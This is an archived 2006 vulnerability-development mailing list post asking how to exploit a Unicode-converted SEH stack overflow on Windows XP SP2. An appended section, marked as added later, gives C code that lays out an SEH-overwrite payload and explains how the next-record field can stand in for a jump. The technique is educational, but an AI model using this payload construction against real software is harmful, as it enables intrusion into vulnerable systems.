Vulnerability Development mailing list archives
Exploiting stack-overflows in Unicode/XPSP2 - Further questions
From: Ivan Stroks <ivanstroks () yahoo co nz>
Date: Thu, 8 Jun 2006 01:13:18 +1200 (NZST)
Hi list,

I am trying to exploit a stack overflow in an application under Windows XP SP2. The problem is that the content of the buffer I can overflow is converted to Unicode, so I can only control 2 of the 4 bytes of the overwritten SEH handler pointer. I have read all the papers related to Unicode shellcoding (Venetian method, etc.) and understand them fully.

My problem is that I am having some issues regarding the way to bring execution back to my code, which is the previous instance. Supposing I can find a pop,pop,ret (or equivalent) that is "Unicode addressable" and I am able to return to my EXCEPTION_REGISTRATION structure, just before my SEH handler. There, I should do a short JMP/CALL to jump over this record, falling into my shellcode. The problem is that, as this value is also encoded in Unicode, I won't be able to specify a JMP/CALL instruction. So... how will I land in my code? Am I missing something here?

Thanks,
IvaN!

Send instant messages to your online friends http://au.messenger.yahoo.com
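The layout the post describes, as an added example that is not part of the original message: an ASCII buffer is widened to UTF-16LE before it overwrites the EXCEPTION_REGISTRATION record, so every second byte of the {next, handler} pair is forced to 0x00 and only dwords of the form 0x00XX00YY can be written. After the pop/pop/ret the widened `next` field is executed as code rather than used as a pointer, so the example also decodes which ASCII pairs turn into harmless instructions (inc/dec/popad followed by `add [reg+0], al`) instead of a jmp, which is the substitute for the short JMP the post asks about. The offset `OFFSET_TO_NSEH`, the pop/pop/ret address 0x00430041 and the 'A' padding are hypothetical values chosen for the illustration, not addresses from any real module.

```c
/* Added example; not code from the original post. Models the widening of an
 * ASCII overflow buffer to UTF-16LE and the resulting EXCEPTION_REGISTRATION
 * overwrite. OFFSET_TO_NSEH and the address 0x00430041 are hypothetical. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define OFFSET_TO_NSEH 12   /* hypothetical: ASCII chars before the record */

/* Each ASCII byte b is stored as the pair {b, 0x00}. Returns bytes written. */
size_t unicode_expand(const char *in, uint8_t *out, size_t outlen)
{
    size_t n = strlen(in);
    if (outlen < 2 * n) return 0;
    for (size_t i = 0; i < n; i++) {
        out[2 * i] = (uint8_t)in[i];
        out[2 * i + 1] = 0x00;
    }
    return 2 * n;
}

/* A dword written through the widening must look like 0x00XX00YY:
 * bytes 1 and 3 are forced to zero, and XX, YY must be non-zero because a
 * zero byte would terminate the input string. */
int is_unicode_addressable(uint32_t v)
{
    return ((v >> 8) & 0xff) == 0 && ((v >> 24) & 0xff) == 0
        && (v & 0xff) != 0 && ((v >> 16) & 0xff) != 0;
}

/* The two ASCII chars that widen into dword v (little-endian). */
int encode_dword(uint32_t v, char out[3])
{
    if (!is_unicode_addressable(v)) return 0;
    out[0] = (char)(v & 0xff);
    out[1] = (char)((v >> 16) & 0xff);
    out[2] = '\0';
    return 1;
}

/* Build the ASCII input: padding, next (2 chars), handler (2 chars). The
 * Venetian-style shellcode would follow the record in a real buffer. */
size_t build_payload(uint32_t ppr_addr, const char nseh[2], char *out, size_t len)
{
    char h[3];
    if (!encode_dword(ppr_addr, h)) return 0;
    if (len < OFFSET_TO_NSEH + 5) return 0;
    memset(out, 'A', OFFSET_TO_NSEH);
    out[OFFSET_TO_NSEH]     = nseh[0];
    out[OFFSET_TO_NSEH + 1] = nseh[1];
    out[OFFSET_TO_NSEH + 2] = h[0];
    out[OFFSET_TO_NSEH + 3] = h[1];
    out[OFFSET_TO_NSEH + 4] = '\0';
    return OFFSET_TO_NSEH + 4;
}

/* Read {next, handler} back from the widened buffer, as the SEH dispatcher
 * would see them on the stack. */
void read_seh_record(const uint8_t *buf, uint32_t *next, uint32_t *handler)
{
    const uint8_t *p = buf + 2 * OFFSET_TO_NSEH;
    *next    = (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    *handler = (uint32_t)p[4] | (uint32_t)p[5] << 8 | (uint32_t)p[6] << 16 | (uint32_t)p[7] << 24;
}

/* After pop/pop/ret, EIP lands on the 4 widened bytes of the `next` field,
 * so that field is executed, not followed. Decode what the pair {a, b}
 * becomes: `a` is a one-byte opcode and `00 b 00` is `add byte ptr [reg+0], al`
 * (opcode 00 /r with mod=01, reg=al, disp8=0; rm=100 would need a SIB byte).
 * Only the opcodes in this small table are decoded; anything else returns 0. */
static const char *reg32[8] = {"eax","ecx","edx","ebx","esp","ebp","esi","edi"};

int describe_nseh(char a, char b, char *out, size_t len)
{
    char first[32];
    uint8_t ua = (uint8_t)a, ub = (uint8_t)b;
    if (ua >= 0x40 && ua <= 0x47)      snprintf(first, sizeof first, "inc %s", reg32[ua - 0x40]);
    else if (ua >= 0x48 && ua <= 0x4f) snprintf(first, sizeof first, "dec %s", reg32[ua - 0x48]);
    else if (ua == 0x61)               snprintf(first, sizeof first, "popad");
    else return 0;
    if ((ub & 0xc0) != 0x40 || (ub & 0x38) != 0 || (ub & 0x07) == 4) return 0;
    snprintf(out, len, "%s ; add byte ptr [%s+0x00], al", first, reg32[ub & 7]);
    return 1;
}

int main(void)
{
    char payload[64], desc[64];
    uint8_t widened[128];
    uint32_t next, handler;

    build_payload(0x00430041, "AC", payload, sizeof payload);
    unicode_expand(payload, widened, sizeof widened);
    read_seh_record(widened, &next, &handler);
    printf("next=0x%08x handler=0x%08x\n", next, handler);
    if (describe_nseh('A', 'C', desc, sizeof desc))
        printf("next field executes as: %s\n", desc);
    return 0;
}
```

The `describe_nseh` check is what replaces the short jump: the `next` field cannot hold a JMP, so it is filled with a pair that widens into instructions that do nothing harmful (here `inc ecx ; add byte ptr [ebx+0x00], al`, which requires EBX to point at writable memory), and execution then runs straight through the handler dword into the bytes after the record. The handler dword itself is also executed on the way; its bytes must be checked the same way before it is used.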
Current thread:
- Exploiting stack-overflows in Unicode/XPSP2 - Further questions Ivan Stroks (Jun 07)